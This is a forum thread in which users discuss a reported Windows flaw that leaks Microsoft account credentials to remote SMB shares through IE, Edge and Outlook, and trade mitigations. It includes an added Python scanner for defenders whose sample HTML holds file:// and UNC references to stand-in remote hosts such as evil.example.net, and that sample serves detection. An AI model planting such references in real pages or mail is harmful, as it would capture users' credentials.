Windows users: IMPORTANT information about password exposure
Kendall Sears
Posts: 2,995
in The Commons
An old bug is back but much more problematic than before.
In case people don't want to read it all, here is the way to mitigate the problem, from the article.
"There's a simple mitigation, according to the group. Don't use Internet Explorer, Edge, or Microsoft Outlook, and don't log in to Windows with a Microsoft account.
Chrome and Firefox users aren't affected."
Please take appropriate measures.
Kendall

Comments
Good to know I'm pretty safe then. I use Chrome, and for mail and other essential programs I use ports of Linux programs in Windows. I refuse to sign up for a Microsoft account, too.
First Apple and now Microsoft. I remember trying to get Apple to close an account I don't use anymore, but they wouldn't, even after they were hacked into. As for my current password, they couldn't crack it without a huge amount of parallel computing resources, and even then it'd take years for them to crack it, or an actual software bug, not a phishing attack. I have no LAN resources worth their while either, and I'm protected against financial crimes by law. LOL, they can get my DAZ renders at the gallery.
Thanks though, a couple of businesses made me change my password in the last 6 months and those 2 passwords aren't that difficult to crack. Need to tighten them up.
...read this this Wednesday morning.
...don't have an MS/Windows account
...don't use IE
...don't use Outlook
I have an account for OneDrive, but recently upgraded my Dropbox account, so won't use it.
Don't use W10, or anything else associated.
This information is typical of ZDNet which is definitely not my preferred source for security questions. MS will never fix this and I think you know why.
Like Nonesuch00 hinted, there is no danger if you use strong authentication methods or strong passwords.
A search on the net for strong password techniques will bring up links like this one: http://www.bu.edu/infosec/howtos/how-to-choose-a-password/
Strong authentication on the other hand is rather easy to set up but people don't like it. Nowadays it includes multi-factor authentication like Password + Pin code or sophisticated methods like Images + facial recognition.
Passwords are the major flaw here, and if people use the Windows internet authentication the password should definitely be strong.
I don't use MS cloud, or any MS account products like Outlook, Hotmail or Win 10... But I do use 2-step verification for my Google partner account. How that works is I log in regularly with user name and password, and once I log in, Google sends a text notice that my Google account has been signed into and asks if it was me. If I click yes, Google does nothing and I stay logged in. If I click no, it logs out my account and locks it out, and Google requires me to make a password change when I sign back in using my security PIN. It is a pain in the ass, but having had someone try a few hundred times to change my passwords or gain access to steal my Google account, I don't want to take any unnecessary chance for my stalker to gain access, even though I am sure he does it just to make my life miserable.
I refused to install Internet Explorer on my home PC. And I don't have Windows 10 either. And never will if I have my way. I only use Firefox or Chrome. Sadly my work applications only work in Internet Explorer (have no idea what they were thinking) so I am forced to use it at work. But my personal stuff only gets done on Firefox or Chrome while I am at work as well.
I believe Outlook is the worst. I've never used it (used Pegasus and now TheBat instead) and that's probably why I've only had 3 virus infections since I joined the internet in 1993, while I've seen people using Outlook getting infected again and again.
I have no problem with IE though, always been my main browser since the first version and never had an infection through it (my AV programs have blocked some malicious scripts but not many). The later versions of IE are much more secure than the earlier ones, in some respects more secure than the other browsers, according to tests.
You miss the point. MOST PEOPLE DON'T use strong authentication nor 2 factor. Those that do are likely security aware and are not likely users of MS internet tech to start with. This post and the ZDNET article are for the 90%+ of the MS user base who are susceptible to the exploit.
Kendall
I use W10 and Outlook, but don't have an MS account. I screen all incoming emails in my BlackBerry device and delete from said device as well. Any emails not received in my BB device are normally junk mail and sitting in the junk mail folder when I do open up Outlook, which I then just auto delete. I never ever ever open an email if I do not recognize the sender or the subject. I use Chrome as my browser.
I use a PIN code to log into Windows now, but I'm not sure technically if Windows 10 and the online Windows web services then use that PIN to avoid sending my encrypted passwords over the internet via some obfuscating and more secure authentication scheme.
The junk mail I get is mostly via my Apple account that I asked them to delete a few years back, but they refused.
I also now get junk mail via my outlook.com (hotmail / live / many names in the past for this online email), but that was my fault for accepting these L.I.O.N. networkers as connections in LinkedIn. I didn't know what that was at first, but I've deleted all of those and don't accept any more of those requests. Some, not all of them, harvest email addresses and such.
The biggest security flaw everyone has, regardless of OS or browser used, is any online service that exposes your email address, since that's the easiest and cheapest way to bypass most security measures with a convincing phishing email forgery. So LinkedIn and Facebook are two services you should be very careful with if you want to avoid phishing attempts. Of course, since almost every online service uses email as the username, as the first step of authentication, there is reason behind these efforts to harvest as many email addresses as possible.
So, I shouldn't have upgraded to Windows 10. This keeps getting better and better (<----- Sarcasm)
I only upgraded because the Windows 10 upgrade window said something about keeping security up to date...
How do you know if your passwords have been exposed?
Surely you need a Microsoft account to sign into Windows?
Is this problem just with Win 10, or is it 8.1 too?
It doesn't help having an "OCD driven" brain at times like these...
No I don't miss the point. Read again!
1. You don't know your passwords have been exposed until you can find them on some websites or someone logs into your account and maybe locks you out from MS services (in the worst case the attacker changes your password and eventually you cannot even log into Windows anymore, not sure on that though).
2. You don't need an MS account to sign into Windows; you can install using a local account as well (though that option only comes on the second or third screen, when you refuse to use an MS account on install). I don't use an MS account for login, so I never tried, but following this article it's quite easy to switch an MS account to a local account on Windows. Some apps might need your MS account data for manual login after that, as Windows cannot log in automatically then - but that should be okay.
3. It's with Windows 8 and 8.1 as well.
Please understand, there is only a possible problem when you use your MS account data to log into Windows (which unfortunately is what Microsoft wants you to do at installation time). If you upgraded from a previous Windows using a local account only, it doesn't change that and you're safe (as long as the local account has its own name/password combination). If you did a clean install and chose a local account there's no real problem either - all that could be stolen eventually would be your local account name and hashed password combination, which simply doesn't matter if only used locally for your Windows login.
FYI: Windows 8/10 tries to access network shares (e.g. on your NAS) with the same name/password combination you use for login. If an attacker emulates a local network share on a website, IE and Edge send your login data and try to log in, which is a problem if the very same data is used for e.g. Outlook, cloud, MS Store, etc. Just make sure you use a local account on Windows 8/10 and it has its own name/password combination (even if that's an easy one), then you're fine.
Edit: I forgot: after switching Windows to a local account, if you think there's a risk someone has already stolen your password, you might want to go to https://login.live.com and change the password on your MS account. It will be needed for logging into MS services and apps like SkyDrive, Mail, MS Store, etc. later.
I don't know if it's true or not, but I also read that because of legacy reasons, Windows passwords that are 7 characters or less use a different kind of encoding. And they decided for some reason to do the same with the next 7 characters. IOW, a 14 letter password is really 2x 7 letters. And is very easy to crack, even by brute force. So you need a password to be at least 15 characters long to have normal security.
same here ....yawwwnn back to work
This thread was meant more for those folks who have upgraded to Windows 10, selected the "Express Setup" which is the default (and also sets everything to ALL of the compromised apps), and weren't concerned about setting good passwords. This is a LOT of people.
Also, the "Windows Login" is NOT a necessary component for this exploit. The "Windows Login" makes it easier to get ALL of the cached passwords that have been entered since these are transferred to the online keyring. Even without a "Windows Login" the exploit will copy the credentials information from the machine's local setup. As stated IN THE ARTICLE the only way to avoid this particular exploit on Windows 10 is to NOT use the listed apps. Use of alternative applications is the currently recommended solution.
As for using strong authentication, this is ALWAYS a good idea. However, (and this is important) the method MS uses for password storage is well understood and has not changed over time. This means that there are lots of ways for the "bad guys" to retrieve the credentials stolen from compromised machines without a lot of work.
For those who are not susceptible, congratulations. For everyone else, please read the article and take appropriate measures before the worst happens.
Kendall
I recommend you read the article again. That's just wrong. ;)
The attack - or the proof of concept linked there - only retrieves credentials that Windows stored for access to network shares, because IE, Edge and Outlook allow access to local shares but unfortunately don't block remote shares and try to log in there as well. This was only called a flaw, as it didn't really affect security for most users who use a local account on Windows (which was the default before Windows 8) - an attacker still needs local access to the PC to use this (well, as long as someone doesn't use some online name/password combination for his local network shares too, which would be weird).
But when you set up Windows using an MS account (mail address + password), it will use these MS account data when trying to connect to local and remote network shares too, and include the mail address + password hash. And now - after cracking the password hash - the attacker has access to your MS services like Skype, Outlook.com, Xbox, etc. THIS is why it's important to NOT use an MS account to log into Windows.
Simple as that.
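The two posts above describe the trigger for this leak: a page or mail body that references a resource on a remote "network share" (a UNC path or a file:// URL pointing at a host outside the LAN), which a UNC-aware client then tries to open, authenticating with the logged-in user's credentials. The following scanner is an added, defender-side illustration of that mechanism, not code from this thread or from the ZDNet article; it walks an HTML document, picks out every reference that would make such a client contact an SMB host, and reports those whose host is not local. The sample document is constructed for the example, and the rule that a bare single-label name counts as local (it can only resolve on the LAN) is a heuristic assumption, as is the explicit list of what counts as a local address range.

```python
import re
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes through which a document can make a client fetch a resource.
RESOURCE_ATTRS = {"src", "href", "data", "poster", "background"}

# Assumption for this example: only these ranges are "local". Python's
# ip_address.is_private would also count the documentation range used in
# the sample (203.0.113.0/24) as private, so the ranges are listed explicitly.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "::1/128", "fe80::/10", "fc00::/7",                # IPv6 equivalents
)]

# Constructed sample: an ordinary-looking mail body mixing normal web links
# with references that point at SMB shares, some local and some remote.
SAMPLE_HTML = r"""
<html><body>
<p>Quarterly report attached.</p>
<img src="https://example.org/logo.png">
<img src="file://203.0.113.5/share/pixel.png">
<img src="\\fileserver\public\banner.png">
<a href="\\203.0.113.5\docs\report.docx">Open report</a>
<iframe src="file:////192.168.1.20/scans/page1.pdf"></iframe>
<div style="background: url(file://evil.example.net/c/bg.gif)"></div>
</body></html>
"""


def host_is_local(host):
    """True if an SMB connection to this host would stay on the LAN."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        # Heuristic: a single-label (NetBIOS-style) name resolves only locally.
        return "." not in host
    return any(ip in net for net in LOCAL_NETS)


def _unc_host(ref):
    """Return the host a UNC-aware client would contact for `ref`, else None."""
    ref = ref.strip()
    if ref.startswith("\\\\"):                       # \\host\share\file
        return ref[2:].replace("/", "\\").split("\\", 1)[0] or None
    parts = urlparse(ref)
    if parts.scheme.lower() != "file":
        return None                                  # http(s) etc. never touch SMB
    if parts.netloc:                                 # file://host/share/file
        return parts.netloc
    host = re.split(r"[\\/]", parts.path.lstrip("/\\"), 1)[0]  # file:////host/...
    if not host or ":" in host:                      # file:///C:/... is a local path
        return None
    return host


class _RefCollector(HTMLParser):
    """Collect every attribute value (and inline CSS url()) that fetches a resource."""

    def __init__(self):
        super().__init__()
        self.refs = []  # (tag, attribute, reference)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name.lower() in RESOURCE_ATTRS:
                self.refs.append((tag, name, value))
            elif name.lower() == "style":
                for url in re.findall(r"url\(\s*['\"]?([^'\")\s]+)", value):
                    self.refs.append((tag, "style", url))


def find_unc_references(html):
    """List every reference that would trigger an SMB connection, with its host."""
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, attr, ref in collector.refs:
        host = _unc_host(ref)
        if host is not None:
            findings.append({"tag": tag, "attr": attr, "ref": ref,
                             "host": host, "local": host_is_local(host)})
    return findings


def remote_share_hosts(html):
    """Sorted, de-duplicated hosts outside the LAN that the document would contact."""
    return sorted({f["host"] for f in find_unc_references(html) if not f["local"]})


if __name__ == "__main__":
    for f in find_unc_references(SAMPLE_HTML):
        verdict = "local" if f["local"] else "REMOTE - would leak credentials"
        print(f"<{f['tag']} {f['attr']}> -> {f['host']:<20} {verdict}")
    print("remote share hosts:", remote_share_hosts(SAMPLE_HTML))
```

Run over a mail body or a saved page, the non-empty `remote_share_hosts` result is the condition to alert on; a mail gateway or proxy that strips or blocks such references removes the trigger regardless of which browser or mail client is installed. The same classification can drive the network-side mitigation Microsoft has long recommended for this class of issue, blocking outbound SMB (TCP 139/445) to anything outside the local network at the perimeter.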
Suddenly grateful I switched over to Mac now. Apple ain't perfect, but at least I don't have to worry The Security Scare of the Week as much as I used to, lmao.
The exploit as listed in that article is only a synopsis of the exploit. The actual research report on it is significantly worse than the minimal coverage at ZDNet.
EDIT: Please note that Edge is also a full-fledged PDF file viewer in addition to a browser. By default it is made the default viewer for PDF files using "Express Setup". This gives it access to the filesystem as well.
EDIT2: Also note that the article does reference that VPN connections can also have their credentials compromised with this exploit. Directly from the article: "Perfect Privacy, a virtual private networking (VPN) provider, said in a blog post that VPN connections are also affected. If a user visits a site while they're connected to a VPN, their credentials will also leak, potentially affecting the anonymity of the user." This, as well as the subtitle to the article, "The flaw, which allows a malicious website to extract user passwords, is made worse if a user is logged in with a Microsoft account." (emphasis mine) alludes to the seriousness of the exploit which is not covered in detail in the article.
Kendall
Thanks for the info Kendall. I'm one of those people that has no idea until someone warns me like this, and even then.... Seems like it's a good idea to just keep the computer that matters disconnected and take the precautions mentioned here with this computer. Thankfully I use none of the apps and services mentioned as being vulnerable. I currently use this computer to download via DIM to an external drive. Studio on my other computer has the folder on that drive mapped to install from. I will be installing 4.9 eventually and authentication will be the only reason that computer will connect. I currently am planning to use DIM still anyway.
You probably can't know for sure unless something happens that indicates it, but you can check here if you're among those who have had their data exposed in certain data breaches:
https://haveibeenpwned.com/
Considering the extent of the damage of such an eventuality, you presume you have, and change your passwords; nice long ones, full of random characters; then store them in encrypted format.
... And I consider Smart Phones to be inherently insecure.
And not OCD enough.
You'd have changed your passwords, not asked about how you can know, otherwise. I find it surprising how many folks find it inconvenient to exercise good password controls. Personally I find it pretty damn inconvenient having my bank account emptied, my credit cards maxed for me, or my identity stolen.
I agree, on all points. Weird passwords that make no sense are a necessity. Smart phones can and will be compromised, so I don't use mine for anything but straight up communication and to store music. Someone hacks my smart phone, all they'll get is a damn good set of songs to listen to. Change passwords, change passwords...and even then -- well, if the feds can be hacked, who are we to think we're safe?
I don't condone security breaches, but I doubt anyone can write a foolproof program. And even if there was such a thing, there'll always be a supersmart hacker out there, just waiting for a new challenge.
I do run Windows 10, and it updated itself yesterday when I rebooted to fix an issue with my headset. I think it updated to the August 2 anniversary update. When I went to sign in, my computer informed me I now had to use my Windows credentials to sign in to my PC, not the local password I had been using previously. It also had reset a lot of my options, such as re-enabling Cortana, automatically signing me into Skype because they had pushed a Skype preview onto this computer, removing the serial number of my anti-virus so it didn't start up, and some other things were also added that I didn't even want on my PC. Then to make it worse there is no way to roll back, because it had deleted all the system restore points and also now says I have no Windows 10 updates installed, so I can't roll back that way. I'm still trying to figure out what I need to do to get my PC back the way it was. Until this update I had no real issues with Windows 10, but now I am considering reinstalling the Windows 7 software that came with my PC originally.
I guess the Aug 2 update hasn't made it to me, yet. That is a major pain of W10, constant updates that eat up download gbs. Some have been security updates though, if I remember right, so that's good.
Back to the hacking...you all don't get emails from you to you, w/attachments that you have more sense than to open, much less download? Or emails from unknown sources, with headings like "Invoice that you requested?" When nobody ever requested an invoice? Hacking is everywhere. Our email addresses are sold, probably on a daily basis. The internet is a blessing and a curse, just like everything else. We just have to be as smart and sly as we can, and hope we get by relatively unscathed.
Sometimes I get the feeling my computer is an open book. I sure hope not, but I get an odd hunch sometimes. I'm tempted to start writing and/or rendering erotica, so the hackers will be embarrassed or at least entertained, whichever suits 'em.
Today just might be that day.
Well, FWIW, I use very strong random passwords that are at least 26 characters long and include ASCII Alt-code characters where I can, my network is behind a physical security appliance box (an older Cisco box), email gets previewed and deleted as needed from the server before downloading (you can do the same with a program called Mailwasher), I haven't used an MS browser since Mozilla/Firefox was available, and Firefox runs ad blockers and tracker blockers, has WebRTC disabled, as well as running NoScript; Flash/Java is not installed, etc. I think I've done pretty much what I can to keep things safe.
If anybody guesses my passwords, I feel kinda sorry for 'em.
I've got walls up, too, hacsart, but sometimes things slip through the cracks. And I've learned to spot a fake email a mile away.
I don't do much FB anymore. Signed up for Twitter, then wondered why I did it, so forget that. I just try to be careful. Oh, and I only frequent established forums.
Thanks for the replies.
@Taozen : Thanks for the link. I've saved it to my favorites.
I have OCD thoughts, but not always actions to go with it.
I don't store passwords on my computer. I've had friends telling me to do so, but I just can't. If anyone broke in and stole my stuff, I want to give them a bit of a challenge.
My computer hasn't been as good since the WIN 10 upgrade (especially on start up), so I may have no choice in regards to rolling back the OS (although, I really like using Win 10).
Sorry, I'm gonna bump this back up to the top --
I just remembered. Isn't a remote control program like...ha ha...RescueMe...necessary for anyone to really scope out what's on someone else's hard drive?